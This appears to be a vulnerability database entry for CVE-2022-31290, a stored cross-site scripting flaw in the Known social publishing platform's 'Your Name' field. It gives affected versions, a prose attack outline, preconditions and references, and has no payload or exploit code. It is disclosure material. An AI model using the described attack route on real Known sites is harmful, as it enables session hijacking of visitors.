CVE-2022-31290
Description
Stored XSS in Known v1.2.2+2020061101 allows authenticated attackers to inject arbitrary scripts via the 'Your Name' field.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Stored XSS in Known v1.2.2+2020061101 allows authenticated attackers to inject arbitrary scripts via the 'Your Name' field.
The vulnerability is a stored cross-site scripting (XSS) issue in Known, a social publishing platform. The 'Your Name' text field does not properly sanitize user input, allowing authenticated users to inject arbitrary HTML and JavaScript [1].
Exploitation requires an authenticated account on the Known instance. The attacker crafts a payload and saves it in the 'Your Name' field. When other users view the attacker's profile or any page that displays the name, the script executes in their browser. No special network position is needed beyond normal web access.
Impact includes session hijacking, defacement, or redirection to malicious sites. Since the XSS is stored, it affects all visitors who view the attacker's profile, potentially leading to widespread compromise within the community.
As of the publication date (2022-07-08), no patch is mentioned in the references. Users should consider upgrading to a newer version if available, or apply input validation. The software is open-source (GitHub [2]), so administrators can review and fix the code.
AI Insight generated on May 21, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
idno/knownPackagist | <= 1.3.1 | — |
Affected products
2Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"Improper neutralization of user-controllable input in the "Your Name" text field before it is rendered in web pages, leading to stored cross-site scripting."
Attack vector
An authenticated attacker injects a crafted payload containing arbitrary JavaScript or HTML into the "Your Name" text field. Because the application does not properly neutralize this user-controllable input before rendering it in web pages served to other users, the payload executes in the browsers of victims who view the attacker's profile or any page that displays the attacker's name [CWE-79]. The attack requires the attacker to have an authenticated session on the Known instance and the victim to visit a page where the unsanitized name is rendered.
Affected code
The advisory does not specify the exact file or function at fault. The vulnerability exists in the "Your Name" text field within Known v1.2.2+2020061101, which is a social publishing platform hosted at the idno/idno GitHub repository [ref_id=1]. No patch file is provided in the bundle.
What the fix does
No patch is included in the bundle. The advisory does not describe a specific remediation. To close this vulnerability, the application should sanitize or encode the "Your Name" field output using context-appropriate escaping (e.g., HTML entity encoding) before rendering it in web pages, preventing injected scripts from being interpreted as executable code [CWE-79].
Preconditions
- authAttacker must have an authenticated account on the Known instance
- inputVictim must visit a page that renders the attacker's unsanitized display name
Generated on May 28, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
7- github.com/advisories/GHSA-g688-7j3c-h9f3ghsaADVISORY
- nvd.nist.gov/vuln/detail/CVE-2022-31290ghsaADVISORY
- docs.withknown.com/en/latest/install/index.htmlghsax_refsource_MISCWEB
- blog.jitendrapatro.me/multiple-vulnerabilities-in-idno-known-php-cms-softwareghsaWEB
- blog.jitendrapatro.me/multiple-vulnerabilities-in-idno-known-php-cms-software/mitrex_refsource_MISC
- withknown.comghsaWEB
- withknown.commitrex_refsource_MISC
News mentions
0No linked articles in our index yet.